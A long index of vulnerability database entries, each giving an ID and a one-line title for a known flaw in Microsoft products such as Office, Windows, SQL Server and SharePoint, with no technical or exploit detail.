[31317] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31316] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31313] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31312] Microsoft Excel 2000/2002/2003/2004/XP privilege escalation [31311] Microsoft Excel 2000/2002/2003/XP privilege escalation [31310] Microsoft Excel 2000/2002/2003/2004/XP memory corruption [31237] Microsoft Office 2000/2003/Xp privilege escalation [31235] Microsoft Office 2000/2003/Xp memory corruption [31233] Microsoft Office 2000/2003/Xp mso.dll lscreateline memory corruption [31133] Microsoft Windows Server 2003/XP explorer.exe memory corruption [30801] Microsoft Windows up to 2000 Connection Manager memory corruption [30131] Microsoft Windows NT 4.0/XP/2000/Server 2003 Distributed Transaction Coordinator denial of service [29524] Microsoft ISA Server 2004 unknown vulnerability [29423] Microsoft Office 2000/2003/2004/Xp excel.exe privilege escalation [29209] Microsoft Office 2000/2003/2004/Xp memory corruption [29208] Microsoft Office 2000/2003/2004/Xp memory corruption [29207] Microsoft Office 2000/2003/2004/Xp memory corruption [29206] Microsoft Office 2000/2003/2004/Xp memory corruption [29205] Microsoft Office 2000/2003/2004/Xp memory corruption [28987] Microsoft Windows NT 4.0/2000/Server 2003 Default Configuration denial of service [28939] Microsoft Word 2003 denial of service [28452] Microsoft Windows 2000/Server 2003/XP unknown vulnerability [28254] Microsoft Windows 2000 Rendering Engine extescape denial of service [27519] Microsoft Windows Server 2003/XP mshtml.dll denial of service [27160] Microsoft Windows 2000/XP Rendering Engine gdi32.dll memory corruption [26618] Microsoft Windows 2000/XP Subsystem memory corruption [25518] Microsoft ISA Server 2000 Packet Filter unknown vulnerability [25517] Microsoft ISA Server 2000 unknown vulnerability [25397] Microsoft ISA Server 2000 wspsrv.exe denial of service [24907] Microsoft Windows 2000 TCP/IP Stack denial of service [24822] Microsoft Outlook 2003 Outlook Web Access weak authentication [24746] Microsoft Windows 2000/ME Explorer denial of service [24640] Microsoft Office InfoPath 2003 SP1 information disclosure [24510] Microsoft Word 2000/2002/2003 memory corruption [24283] Microsoft Windows 2000/Server 2003/XP memory corruption [24252] Microsoft Windows 2000/NT memory corruption [22602] Microsoft Windows 2000/NT BASE winhlp32.exe memory corruption [22126] Microsoft Outlook 2003 Access Restriction privilege escalation [68416] Microsoft Exchange 2007/2010/2013 Outlook Web Access privilege escalation [68409] Microsoft Office 2007/2010/2013 memory corruption [68408] Microsoft Excel 2007/2010/2013 privilege escalation [68407] Microsoft Excel 2007/2010 privilege escalation [68405] Microsoft Word 2007/2010 Index privilege escalation [68195] Microsoft Windows 7/Server 2003/Server 2008/Vista Input Method Editor privilege escalation [68189] Microsoft Windows Server 2003 SP2 TCP/IP Stack privilege escalation [68188] Microsoft Word 2007 File privilege escalation [68187] Microsoft Word 2007 File privilege escalation [68186] Microsoft Word 2007 File privilege escalation [67829] Microsoft Office 2007/2010/2011 Object privilege escalation [67825] Microsoft .NET Framework 2.0/3.5/3.5.1 ASLR privilege escalation [67354] Microsoft SQL Server 2008 R2 SP2/2008 SP3/2012 SP1/2014 SQL Master Data Services denial of service [67353] Microsoft SQL Server 2008 R2 SP2/2008 SP3/2012 SP1/2014 T-SQL Query cross site scripting [67018] Microsoft Windows Server 2008/Server 2012/Server 2012 R2 Service Bus denial of service [22011] Microsoft Windows Server 2003 idirectplay4 API denial of service [21967] Microsoft Windows 2000/ME Media Player cross site scripting [21899] Microsoft Windows Server 2003/XP Help/Support Center dvdupgrd.htm memory corruption [21876] Microsoft Windows 98/2000/Server 2003/XP H.323 memory corruption [21873] Microsoft Windows ME/XP/NT 4.0/2000/Server 2003 memory corruption [21838] Microsoft Sharepoint Portal Server 2001 cross site scripting [21476] Microsoft Windows 2000 Message Queue Manager memory corruption [21448] Microsoft Windows up to 2000 SP3/XP Terminal Service msgina.dll denial of service [21095] Microsoft Windows up to 2000 SP3 SMTP Service denial of service [20978] Microsoft Windows Server 2003 Shell Link directory traversal [20961] Microsoft Windows up to 2000 SP4 Troubleshooter ActiveX Control Tshoot.ocx RunQuery2 memory corruption [20960] Microsoft Windows up to Server 2003 Authenticode privilege escalation [20662] Microsoft Windows up to 2000 SP3 shell32.dll ShellExecute memory corruption [20214] Microsoft ISA Server 2000 DNS Intrusion Detection Application Filter denial of service [20213] Microsoft Windows 2000 Script Engine for JScript JScript.dll JsArrayFunctionHeapSort Integer Coercion Error [20109] Microsoft Outlook 2002 V1 Exchange Server Security Certificate weak encryption [19970] Microsoft Windows 2000 Active Directory privilege escalation [19743] Microsoft Outlook 2002 javascript URI cross site scripting [19742] Microsoft Outlook 2000/2002 IFRAME privilege escalation [19719] Microsoft Windows up to 2000 SP2 DCOM Client information disclosure [19623] Microsoft SQL Server up to 2000 SP2 Stored Procedure sp_MSSetServerProperties/sp_MSsetalertinfo privilege escalation [19574] Microsoft Windows 2000/XP Log Size denial of service [19518] Microsoft Exchange 2000 Request denial of service [19515] Microsoft Exchange 2000 Remote Procedure Call denial of service [19514] Microsoft SQL Server up to 2000 Authentication Password weak encryption [19355] Microsoft Windows 2000 TCP Packet denial of service [19218] Microsoft Outlook 2002 Header Field denial of service [19105] Microsoft Windows 2000/XP PPTP Service memory corruption [19082] Microsoft Windows 2000 SP2 SNMP LAN Manager denial of service [19054] Microsoft Windows 2000/XP RDP denial of service [19053] Microsoft Windows 2000/XP RDP weak encryption [18800] Microsoft SQL Server 2000 Authentication memory corruption [18789] Microsoft SQL Server 2000 SP2 Stored Procedure sp_MScopyscript privilege escalation [18777] Microsoft Project 2000/2002 Office Web Components Copy/Paste privilege escalation [18776] Microsoft Project 2000/2002 Office Web Components LoadText File information disclosure [18774] Microsoft Project 2002 Office Web Components setTimeout privilege escalation [18755] Microsoft SQL Server 2000 Jet Engine opendatasource memory corruption [18615] Microsoft SQL Server 2000 0x08 Packet denial of service [18598] Microsoft SQL Server 2000 Keep-Alive denial of service [18597] Microsoft SQL Server 2000 Resolution Service memory corruption [18596] Microsoft SQL Server 2000 Stored Procedure sql injection [18595] Microsoft SQL Server 2000 DBCC memory corruption [18593] Microsoft Word 2000 Mail Merge Tool privilege escalation [18592] Microsoft Excel 2000/2002 Macro Security privilege escalation [18591] Microsoft Excel 2000/2002 Macro Security privilege escalation [18590] Microsoft Excel 2000/2002 Macro Security privilege escalation [18537] Microsoft Outlook 2002 Windows Media Player player.launchurl cross site scripting [18464] Microsoft Windows 2000 Terminal Server privilege escalation [18411] Microsoft SQL Server 2000 Query memory corruption [18410] Microsoft SQL Server 2000 Password Encryption memory corruption [18346] Microsoft SQL Server 2000 SQLXML cross site scripting [18345] Microsoft SQL Server 2000 SQLXML ISAPI Extension memory corruption [18276] Microsoft Windows 2000 LANMAN Service denial of service [18245] Microsoft Exchange 2000 RFC Message Attribute denial of service [18138] Microsoft Word 2000/2002 Rich Text Format cross site scripting [18130] Microsoft Windows 2000 denial of service [17973] Microsoft Windows 2000 Shell memory corruption [17960] Microsoft Windows 2000/XP SMTP Service denial of service [17959] Microsoft Windows 2000 SMTP Service privilege escalation [17955] Microsoft Exchange 2000 Privilege Registry privilege escalation [17947] Microsoft Windows 2000 Telnet Server memory corruption [17946] Microsoft Windows 2000/NT Authorization weak authentication [17852] Microsoft ISA Server 2000 UDP Packet denial of service [17834] Microsoft Windows 2000 NTFS privilege escalation [17728] Microsoft Windows 2000 IKE denial of service [17718] Microsoft Windows 2000/XP Network Address Translation weak authentication [17389] Microsoft Windows 2000 IrDA Driver memory corruption [17388] Microsoft ISA Server 2000 URL cross site scripting [17374] Microsoft ISA Server 2000 H.323 denial of service [17161] Microsoft Outlook 2002 View ActiveX Control privilege escalation [17147] Microsoft Windows 2000 SMTP Service privilege escalation [17056] Microsoft Windows 2000 Telnet Service denial of service [17055] Microsoft Windows 2000 Telnet Domain User information disclosure [17054] Microsoft Windows 2000 Telnet Service denial of service [17053] Microsoft Windows 2000 Telnet Session denial of service [17050] Microsoft Exchange 2000/5.5 Outlook Web Access cross site scripting [17049] Microsoft Windows 2000 Message Request denial of service [17015] Microsoft Exchange 2000/5.5 LDAP denial of service [16917] Microsoft ISA Server 2000 Web Proxy denial of service [16824] Microsoft Windows 2000 Internet Printing ISAPI Extension msw3prt.dll memory corruption [16822] Microsoft Windows 2000 Kerberos denial of service [16754] Microsoft Outlook up to 2000 Holiday Feature weak authentication [16600] Microsoft Windows 2000 Event Viewer memory corruption [16599] Microsoft Outlook 2000/98/5.0 vCard memory corruption [16381] Microsoft Windows 2000 RDP denial of service [16370] Microsoft Windows 2000/ME Web Extender Client privilege escalation [16295] Microsoft Exchange 2000 User Account weak authentication [16267] Microsoft Windows 2000 Telnet Service denial of service [16055] Microsoft Windows 2000 System Monitor ActiveX Control memory corruption [15985] Microsoft Windows up to XP Office 2000 File riched20.dll privilege escalation [15965] Microsoft Windows 2000 NTLM Authentication telnet.exe privilege escalation [15930] Microsoft Word 2000 Mail Merge Tool privilege escalation [15907] Microsoft Word/Excel/Powerpoint 2000 Object Tag memory corruption [15782] Microsoft Outlook up to 2000 Cache privilege escalation [15773] Microsoft Outlook up to 2000 Date Field memory corruption [15764] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 HTTP 1.0 Request IP Address information disclosure [15726] Microsoft Windows 2000 Telnet Server denial of service [15725] Microsoft Windows 2000 Port denial of service [15542] Microsoft Office 2000 UA ActiveX Control Show Me privilege escalation [15325] Microsoft Windows 2000 Share weak authentication [15120] Microsoft IIS 2.0/3.0 ASP Source information disclosure [14512] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion privilege escalation [14465] Microsoft IIS 2.0/3.0/4.0/5.0 IISAPI Extension perl.exe information disclosure [14423] Microsoft Windows 2000/NT PDC/BDC privilege escalation [14418] Microsoft Windows 2000/NT OS/2/POSIX Subsystem privilege escalation [14394] Microsoft Windows 2000/NT NT Alerter privilege escalation [13908] Microsoft IIS 2.0/3.0 URL denial of service [13545] Microsoft Word 2007 Embedded Font memory corruption [13462] Microsoft Visual Studio 2002/2003/2005/2010 Debug Interface msdia.dll privilege escalation [13397] Microsoft Windows 2000/Server 2003/XP DHCP Response weak authentication [13229] Microsoft Office 2007/2010/2013 Common Control Library MSCOMCTL.OCX privilege escalation [13227] Microsoft Office 2007/2010/2013 Chinese Grammar Checker privilege escalation [13226] Microsoft SharePoint Server 2007/2010/2013 Page privilege escalation [13225] Microsoft SharePoint Server 2007/2010/2013 cross site scripting [13224] Microsoft SharePoint Server 2007/2010/2013 Page privilege escalation [12859] Microsoft Word 2003 Office Document memory corruption [12845] Microsoft Word 2003 Office File memory corruption [12844] Microsoft Word 2007/2010 Office File memory corruption [12843] Microsoft Office 2007/2010/2011/2013 XML Parser denial of service [12687] Microsoft Word/Office/Outlook 2003/2007/2010/2013 RTF Document memory corruption [12530] Microsoft Windows Server 2003/Server 2008/Server 2012/Vista/XP Security Account Manager privilege escalation [12266] Microsoft .NET Framework 2.0 SP2/3.5.1 ASLR privilege escalation [12070] Apple Pages 2.0/2.0.1/2.0.2/5.0/5.0.1 on Mac Microsoft Word Document denial of service [11950] Microsoft Office Compability Pack/Word 2007 SP3 File memory corruption [11949] Microsoft Word Viewer/Office Compatibility Pack/Word 2003 SP3/2007 SP3 File memory corruption [11494] Microsoft .NET Framework 2.0 SP2/3.5.1/4/4.5/4.5.1 MAC Authentication privilege escalation [11448] Microsoft Office 2007/2010 Address Space Layout Randomization privilege escalation [11230] Microsoft Word 2003 DOC Document denial of service [11148] Microsoft Office 2003/2007 WordPerfect Document epsimp32.flt memory corruption [11146] Microsoft Office 2003/2007 epsimp32.flt memory corruption [11081] Microsoft Windows Server 2008/Vista TIFF Image privilege escalation [10648] Microsoft Word 2007 Word File memory corruption [10647] Microsoft Word 2003 Word File memory corruption [10643] Microsoft SharePoint Server 2007/2010/2013 Input Sanitizer memory corruption [10642] Microsoft SharePoint Server 2007/2010 Content Display in Frames privilege escalation [10247] Microsoft SharePoint Server 2007/2010/2013 Online Cloud cross site scripting [10245] Microsoft Office 2003/2007/2010 Word File memory corruption [10244] Microsoft Office 2003 SP3 Word File memory corruption [10243] Microsoft Office 2003/2007 Word File memory corruption [10242] Microsoft Office 2007 Word File memory corruption [10241] Microsoft Office 2007 Word File memory corruption [10240] Microsoft Office 2003/2007/2010 Word File memory corruption [10239] Microsoft Office 2003/2007 Word File memory corruption [10238] Microsoft Excel 2003/2007 XML External Entity Data memory corruption [10237] Microsoft Excel 2003/2007/2010 XML External Entity Data privilege escalation [10236] Microsoft Word/Office 2003/2007 XML External Entity Data information disclosure [10234] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10232] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10231] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10230] Microsoft Word/Sharepoint 2003 SP3/2007 SP3/2010 SP1 Office File memory corruption [10229] Microsoft Access 2007/2010/2013 Access File memory corruption [10228] Microsoft Access 2007/2010/2013 Access File memory corruption [10227] Microsoft Access 2007/2010/2013 Access File memory corruption [10192] Microsoft Windows 7/2000/Server 2003 SP2/Vista/XP SP3 Windows Theme File privilege escalation [10191] Microsoft Windows Server 2003/XP OLE Object memory corruption [10190] Microsoft Windows 7/8/Server 2008/Vista Active Directory privilege escalation [10189] Microsoft Outlook 2007/2010 S/MIME denial of service [9941] Microsoft Windows Server 2003/XP Unicode Scripts Processor USP10.DLL memory corruption [9929] Microsoft Windows Server 2008/Server 2012 Active Directory Federation Services information disclosure [9715] Microsoft PowerPoint 2007 DirectShow Runtime quartz.dll GetMaxSampleSize memory corruption [9397] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Array privilege escalation [9394] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 on 64-bit Array privilege escalation [9393] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Permission privilege escalation [8737] Microsoft Word 2003 SP3 Shape Data Parser privilege escalation [8723] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 XML File privilege escalation [7643] Microsoft Windows Server 2008 R2/Server 2012 NFS Server denial of service [7642] Microsoft Exchange 2007/2010 Outlook Web Access vspdx.dll) memory corruption [7641] Microsoft Windows Server 2003/Server 2008/Vista/XP DirectShow Quartz.dll privilege escalation [7248] Microsoft Windows 7/Server 2008 R2 Print Spooler memory corruption [7121] Microsoft Exchange 2007/2010 RSS Feed privilege escalation [7118] Microsoft Windows Server 2008 R2/Server 2012 IP-HTTPS privilege escalation [7058] Microsoft Windows 7/Server 2008 R2 DHCPv6 Message denial of service [6935] Microsoft Office Excel 2003/2007/2010 Input Sanitizer memory corruption [6934] Microsoft Office Excel 2003/2007/2010 Input Sanitizer memory corruption [6933] Microsoft Office Excel 2003/2007/2010 SerAuxErrBar memory corruption [6929] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 Web Proxy Setting Auto-Discovery privilege escalation [6927] Microsoft .NET Framework 2.0 SP2/3.5.1 Trusted Code Function information disclosure [6918] Microsoft Excel 2007 SP2 Input Sanitizer memory corruption [6830] Microsoft Word 2007/2010 File memory corruption [6819] Microsoft Excel 2007 File memory corruption [6627] Microsoft Windows 7/Server 2008 R2 Kerberos denial of service [6626] Microsoft SharePoint/Lync/Infopath 2007/2010 HTML Sanitization cross site scripting [6621] Microsoft Word 2007 PAPX privilege escalation [5945] Microsoft Office 2007/2010 memory corruption [5939] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Print Spooler Service Format String [5938] Microsoft Windows 7/Server 2003/Server 2008 R2/Vista/XP Remote Administration Protocol netapi32.dll privilege escalation [5933] Microsoft SQL Server 2000/2005/2008/2008 R2 Common Controls TabStrip ActiveX MSCOMCTL.OCX privilege escalation [5932] Microsoft Office 2003/2007/2010 Common Controls TabStrip ActiveX MSCOMCTL.OCX privilege escalation [5654] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP information disclosure [5653] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5652] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP win32k.sys privilege escalation [5650] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5649] Microsoft Office 2003/2007/2010 libraries privilege escalation [5645] Microsoft SharePoint 2007/2010/3.0 Reflected cross site scripting [5643] Microsoft SharePoint 2007/2010 privilege escalation [5642] Microsoft SharePoint 2007 privilege escalation [5553] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Font atmfd.dll denial of service [5524] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP privilege escalation [5518] Microsoft .NET Framework 2.0 SP2/3.5/3.5.1/4/4.5 privilege escalation [5362] Microsoft Office 2003/2007 GDI+ privilege escalation [5358] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP TrueType Font Handling memory corruption [5291] Microsoft Visual Studio 2008 Incremental Linker link.exe ConvertRgImgSymToRgImgSymEx Integer Coercion Error [5268] Microsoft Office 2008 on Mac RTF Pfragment File memory corruption [5080] Microsoft SQL Server 2005/2008/2008R2 CREATE DATABASE sql injection [5050] Microsoft Office 2007 WPS Converter memory corruption [5049] Microsoft SQL Server 2000/2005/2008 MSCOMCTL.OCX privilege escalation [5048] Microsoft Office 2003/2007/2010 MSCOMCTL.OCX privilege escalation [5046] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Windows Authenticode Signature Verification privilege escalation [4803] Microsoft Windows Server 2003/Server 2008 DNS Server Domain Resource Record Query Parser denial of service [4802] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Protocol privilege escalation [4798] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Remote Desktop Service privilege escalation [4642] Microsoft .NET Framework 2.0 SP2/3.5.1/4 XAML Browser Application privilege escalation [4535] Microsoft Windows Server 2003/XP Object Packager packager.exe privilege escalation [4534] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Line21 DirectShow Filter Quartz.dll/Qdvd.dll memory corruption [4533] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Multimedia Library winmm.dll memory corruption [4507] Microsoft .NET Framework 2.0 SP2/3.5 SP1/3.5.1/4.0 Forms Authentication privilege escalation [4482] Microsoft Word 2007/2010/2011 Document Parser denial of service [4480] Microsoft Excel 2003 privilege escalation [4478] Microsoft Windows Server 2003/XP OLE Objects Memory Management privilege escalation [4477] Microsoft PowerPoint 2007 SP2/2008 OfficeArt privilege escalation [4474] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Active Directory Query memory corruption [4473] Microsoft PowerPoint 2007 SP2/2010 DLL-Loader privilege escalation [4471] Microsoft Office 2003/2007 Publisher privilege escalation [4470] Microsoft Office 2003 SP3 privilege escalation [4453] Microsoft Excel 2003 Record Parser privilege escalation [4446] Microsoft Office 2007/2008 OfficeArt Record Parser privilege escalation [4445] Microsoft Office 2007/2010/2011 Word Document Parser denial of service [4438] Microsoft Windows 7/Server 2008/Vista TCP/IP Reference Counter Numeric Error [4412] Microsoft Office 2003/2007 Library Loader privilege escalation [4411] Microsoft Excel 2003 denial of service [4409] Microsoft Windows Server 2003/Server 2008 WINS privilege escalation [4396] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack denial of service [4393] Microsoft Windows Server 2008 DNS Service privilege escalation [4391] Microsoft .NET Framework 2.0 SP2/3.5.1/4 Socket Restriction information disclosure [4390] Microsoft Windows Server 2008 Remote Desktop Web Access cross site scripting [4388] Microsoft Windows 7/Server 2008/Vista File Metadata Parser denial of service [4369] Microsoft Excel 2002/2003/2007 privilege escalation [4367] Microsoft Windows Server 2008 Hyper-V VMBus denial of service [4362] Microsoft Windows 7/Server 2008/Vista denial of service [4349] Microsoft Office 2004/2007/2008 Presentation File Parser privilege escalation [4348] Microsoft PowerPoint 2002/2003/2007 privilege escalation [4334] Microsoft .NET Framework 2.0 SP2/3.5 SP1/3.5.1/4.0 JIT Compiler privilege escalation [4332] Microsoft PowerPoint 2007/2010 privilege escalation [4301] Microsoft Windows Server 2003 SMB Browser memory corruption [4298] Microsoft Windows 7/Server 2008 JScript/VBScript Engine information disclosure [4297] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP OpenType Compact Font Format Driver privilege escalation [4296] Microsoft Windows Server 2003/XP LSASS weak authentication [4295] Microsoft Windows 7/Server 2008 Kerberos weak authentication [4294] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys privilege escalation [4293] Microsoft Windows Server 2003/XP Kerberos CRC32 Checksum weak encryption [4292] Microsoft Windows Server 2003/XP CSRSS Logoff privilege escalation [4289] Microsoft Excel 2007 Shape Data Parser denial of service [4286] Microsoft PowerPoint 2002 SP3/2003 SP3/2004/2007 SP2/2008 OfficeArt Container Parser privilege escalation [4279] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP MHTML cross site scripting [4231] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Driver win32k.sys GreEnableEUDC memory corruption [4230] Microsoft Exchange 2007 on 64-bit RPC store.exe denial of service [4229] Microsoft SharePoint 2007 Document Conversion Launcher Service unknown vulnerability [4228] Microsoft Windows Server 2008 Hyper-V VMBus privilege escalation [4224] Microsoft Windows 7/Server 2008/Vista Consent User Interface privilege escalation [4204] Microsoft Windows Server 2008 Color Control Panel unknown vulnerability [4197] Microsoft SharePoint 2007/3.0 cross site scripting [4196] Microsoft Word 2002/2003/2007/2010 memory corruption [4194] Microsoft Windows 7/Server 2008/Vista SChannel Client privilege escalation [4187] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack Ipv4SetEchoRequestCreate denial of service [4186] Microsoft Outlook 2002/2003/2007 Content Parser memory corruption [4165] Microsoft Windows 7/Server 2008/Vista TCP/IP Stack memory corruption [4162] Microsoft Windows 7/Server 2008/Vista Kernel race condition [4159] Microsoft Excel 2002/2003 SXDB PivotTable privilege escalation [4151] Microsoft Windows Server 2008/Vista NtUserCheckAccessForIntegrityLevel denial of service [4149] Microsoft Windows 7/Server 2003/Server 2008/Vista/XP Shell Shortcut Parser privilege escalation [4146] Microsoft Outlook 2002/2003/2007 SMB Attachment PR_ATTACH_METHOD privilege escalation [4145] Microsoft Access 2003/2007 ActiveX ACCWIZ.dll privilege escalation [4133] Microsoft Office 2003/2007/Xp COM Object Instantiator privilege escalation [4125] Microsoft SharePoint 2007/3.0 help.aspx cross site scripting [4107] Microsoft Windows 7/Server 2008 Kernel privilege escalation [4103] Microsoft Windows Server 2003 Media Services memory corruption [4090] Microsoft Excel 2002/2003/2007 privilege escalation [4082] Microsoft PowerPoint 2002 SP3 memory corruption [4069] Microsoft Project 2003/2007 Project Memory Validator denial of service [4056] Microsoft Word 2002/2003 File Information Block Parser memory corruption [4031] Microsoft Windows Server 2008/Vista SMB Processor EducatedScholar denial of service [4030] Microsoft Windows Server 2008/Vista Wireless LAN AutoConfig Service memory corruption [4029] Microsoft Windows 2000/XP TCP/IP Window Size denial of service [4000] Microsoft Office 2003/Sp3/Xp Web Components privilege escalation [3999] Microsoft Office 2007 Pointer privilege escalation [3974] Microsoft PowerPoint 2000/2002/2003 Sound Data memory corruption [3973] Microsoft PowerPoint 2000/2002/2003 Notes Container memory corruption [3972] Microsoft PowerPoint 2000/2002/2003 BuildList memory corruption [3971] Microsoft PowerPoint 2000/2002/2003 Object memory corruption [3970] Microsoft PowerPoint 2000/2002/2003 Paragraph memory corruption [3969] Microsoft PowerPoint 2000/2002/2003 Atom memory corruption [3960] Microsoft Windows 2000/Server 2003/XP DirectShow MJPEG privilege escalation [3952] Microsoft ISA Server 2004/2006 denial of service [3946] Microsoft PowerPoint 2000/2002/2003/2004 privilege escalation [3939] Microsoft Windows 2000 DNS privilege escalation [3938] Microsoft Windows 2000 SSL weak authentication [3937] Microsoft Windows 2000 privilege escalation [3932] Microsoft Excel 2000/2002/2003/2004/2007 Object Reference privilege escalation [3896] Microsoft SQL Server up to 2005 sp_replwritetovarbin memory corruption [3892] Microsoft Excel 2000/2002/2003 Formula denial of service [3891] Microsoft Excel 2000/2002/2003 denial of service [3890] Microsoft Excel 2000/2002/2003 NAME Index denial of service [3889] Microsoft Word 2000/2002/2003/2007 Table Property memory corruption [3888] Microsoft Word 2000/2002/2003/2007 RTF Stylesheet denial of service [3887] Microsoft Word 2000/2002/2003/2007 denial of service [3886] Microsoft Word 2000/2002/2003/2007 ControlWord memory corruption [3885] Microsoft Word 2000/2002/2003/2007 denial of service [3884] Microsoft Word 2000/2002/2003/2007 denial of service [3883] Microsoft Word 2000/2002/2003/2007 RTF memory corruption [3882] Microsoft Word 2000/2002/2003/2007 LFO privilege escalation [3845] Microsoft Windows 2000 SP4 Active Directory denial of service [3844] Microsoft Excel 2003 REPT Numeric Error [3843] Microsoft Excel up to 2007 BIFF File denial of service [3842] Microsoft Excel 2003 VBA Performance Cache denial of service [3797] Microsoft Windows Server 2008/Vista IPsec Policy information disclosure [3796] Microsoft Office 2000 WPG privilege escalation [3795] Microsoft Office 2000/2003/Xp BMP Image BMPIMP32.FLT denial of service [3794] Microsoft Office 2000/2003/Xp PICT bits_per_pixel denial of service [3793] Microsoft Office 2000/2003/Xp PICT denial of service [3792] Microsoft Office 2000 EPS File privilege escalation [3783] Microsoft Word 2002 denial of service [3778] Microsoft Exchange 2003/2007 Outlook Web Access cross site scripting [3777] Microsoft Windows Server 2008/Vista SP1 Explorer privilege escalation [3732] Microsoft Windows 2000/Server 2003 WINS privilege escalation [3701] Microsoft Word 2003 CSS privilege escalation [3700] Microsoft Word 2003 RTF Document privilege escalation [3648] Microsoft Excel 2003 privilege escalation [3647] Microsoft Outlook up to 2007 mailto URI privilege escalation [3552] Microsoft Excel 2000/2002/2003 File memory corruption [3373] Microsoft Word 2000/2002 privilege escalation [3241] Microsoft Excel 2000/2003/2004/XP SP3 rtWnDesk memory corruption [3223] Microsoft Windows Server 2003/XP URI privilege escalation [3176] Microsoft Excel 2000/2002/2003/2007 File Attribute memory corruption [3175] Microsoft Excel 2000/2002/2003/2007 Active Worksheet memory corruption [3174] Microsoft Excel 2000/2002/2003/2007 Version Information memory corruption [3172] Microsoft Office Publisher 2007 Pointer denial of service [3067] Microsoft Office 2000/2003/2004/2007/Xp Drawing Object denial of service [3065] Microsoft Excel 2000/2002/2003/2007 Filter memory corruption [3064] Microsoft Excel 2000/2002/2003/2004/2007 set Font memory corruption [3063] Microsoft Excel 2000/2002/2003/2007 BIFF Record memory corruption [3012] Microsoft Windows 2000/Server 2003 DNS Service memory corruption [3004] Microsoft Windows up to 2003/XP URL Parser memory corruption [2990] Microsoft Windows 2000/Vista/XP Animated Cursor memory corruption [2939] Microsoft Word 2000 memory corruption [2933] Microsoft Windows 2000 SP4/Server 2003 SP1/XP SP2 OLE Dialog privilege escalation [2894] Microsoft Office 2000/2003/2004/Xp Undefined String Format String [2884] Microsoft Word 2000/2002/2003 memory corruption [2811] Microsoft Windows 2000/Server 2003/XP VML Vector Markup Language Integer Coercion Error [2810] Microsoft Outlook 2000/2002/2003 Office Saved Search memory corruption [2809] Microsoft Outlook 2000/2002/2003 Header denial of service [2808] Microsoft Outlook 2000/2002/2003 Meeting denial of service [2807] Microsoft Excel 2000/2002/2003 XLS File privilege escalation [2789] Microsoft Windows 2000/XP RPC Request NetrWkstaUserEnum denial of service [2765] Microsoft Project Server 2003 pdsrequest.asp weak authentication [2739] Microsoft Windows 2000 Remote Installation Service unknown vulnerability [2738] Microsoft Windows 2000/Server 2003/XP SNMP memory corruption [2737] Microsoft Windows Server 2003/XP Manifest privilege escalation [2718] Microsoft Word 2000/2002/2003 DOC Document memory corruption [2717] Microsoft Windows 2000 Print Spooler denial of service [2689] Microsoft Windows up to 2000 SP4 Active Directory denial of service [2688] Microsoft Windows 2000/Server 2003/XP Client Service for Netware denial of service [2687] Microsoft Windows 2000/Server 2003/XP Agent ActiveX Numeric Error [2686] Microsoft Windows 2000/Server 2003/XP Client Service for Netware memory corruption [2684] Microsoft Windows 2000/XP Workstation Service memory corruption [2659] Microsoft Windows 2000/XP GDI memory corruption [2655] Microsoft Windows 2000/Server 2003/XP XML Core Services memory corruption [2610] Microsoft PowerPoint 2003 PPT Document denial of service [2601] Microsoft Windows Server 2003/XP IPv6 Stack denial of service [2600] Microsoft Windows Server 2003/XP IPv6 Stack TCP weak encryption [2599] Microsoft Windows Server 2003/XP IPv6 Stack ICMP weak encryption [2598] Microsoft Windows Server 2003/XP Object Packager privilege escalation [2597] Microsoft Office 2003/Xp Smart-Tag Parser memory corruption [2596] Microsoft Office 2000/2003/2004/Xp Value Read privilege escalation [2595] Microsoft Office 2000/2001/2003/2004 Diagram Value privilege escalation [2594] Microsoft Office 2000/2001/2003/2004 Document memory corruption [2571] Microsoft PowerPoint up to 2003 Document privilege escalation [2554] Microsoft PowerPoint 2000 memory corruption [2522] Microsoft Windows 2000/Server 2003/XP Indexing Service cross site scripting [2508] Microsoft Word 2000 memory corruption [2436] Microsoft Windows 2000/Server 2003/XP Kernel memory corruption [2435] Microsoft Windows 2000/Server 2003/XP Exception memory corruption [2434] Microsoft Windows 2000/Server 2003/XP Winlogon privilege escalation [2433] Microsoft Windows 2000 Management Console cross site scripting [2432] Microsoft Windows 2000/Server 2003/XP DNS Resolver memory corruption [2431] Microsoft Windows 2000/Server 2003/XP Winsock API memory corruption [2430] Microsoft Windows 2000/Server 2003/XP RPC ELV memory corruption [2426] Microsoft Windows 2000/Server 2003/XP WMF File gdi32.dll denial of service [2415] Microsoft Windows 2000/Server 2003/XP SMB File srv.sys privilege escalation [2382] Microsoft PowerPoint up to 2003 Presentation Open/Close memory corruption [2378] Microsoft PowerPoint 2000/2002/2003 Document Parser memory corruption [2370] Microsoft 